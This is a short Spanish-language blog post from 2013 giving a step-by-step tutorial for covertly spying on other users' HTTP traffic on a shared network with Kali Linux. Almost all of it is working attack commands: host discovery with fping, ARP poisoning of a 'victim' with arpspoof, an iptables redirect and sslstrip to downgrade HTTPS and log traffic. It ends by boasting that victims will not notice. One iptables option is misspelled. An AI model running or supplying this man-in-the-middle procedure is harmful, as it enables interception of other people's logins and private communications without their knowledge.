miércoles, 20 de noviembre de 2013

ESPIANDO EL TRAFICO HTTP

hola
esta prueba la realice con el cd live de kali-linux y lo que necesitamos para espiar el trafico http es los siguiente:

  1. sslstrip (sudo apt-get install sslstrip)
  2. fping (sudo apt-get install fping)
  3. python (lo incluye por defecto)
iniciemos con el tutorial:

1) lo que debemos saber es como esta configurada la red con el siguiente comando
       ifconfig
miramos cual es la dirección ip que nos dio el router al que estamos conectamos por ejemplo: 192.168.0.100
2) ahora buscamos las otras pc's que estan conectadas con el siguiente comando:
      fping -a -g 192.168.0.1 192.168.0.254 > hosts
3) esperamos a que termine para luego leer los hosts con el siguiente comando
     cat hosts
lo que sigue lo debemos de hacer en tres terminales
TERMINAL 1:
1) accedemos como root o super usuario con el siguiente comando
     sudo -sH
2) activamos el ip forwarding con el siguiente comando
     echo 1 > /proc/sys/net/ipv4/ip_forward
3) ejecutamos el comando arpspoof -i <interfaz> -t <victima> <puerta de enlace> con el siguiente comando:
     arpspoof -i wlan0 -t 192.168.0.104 192.168.0.1
donde 192.168.0.1 es la dirección del router que da el internet a la cual estoy conectado y 192.168.0.104 es la ip del computador de la victima
TERMINAL 2:
1) redireccionamos el trafico http del puerto 80 al puerto 8080 con el siguiente comando
     sudo iptables -t nat -A PREROUTING -p tcp --detination-port 80 -j REDIRECT --to-ports 8080
2) ejecutamos sslstrip indicandole -w que lo guarde en un archivo y -l que escuche por el puerto 8080 con el siguiente comando
    sslstrip -w cap -l 8080
TERMINAL 3:
1) finalmente el comando tail para leer la informacion
    tail -f cap
listo ya esta
con esto no se dan cuenta de que los están espiando

No hay comentarios:

Publicar un comentario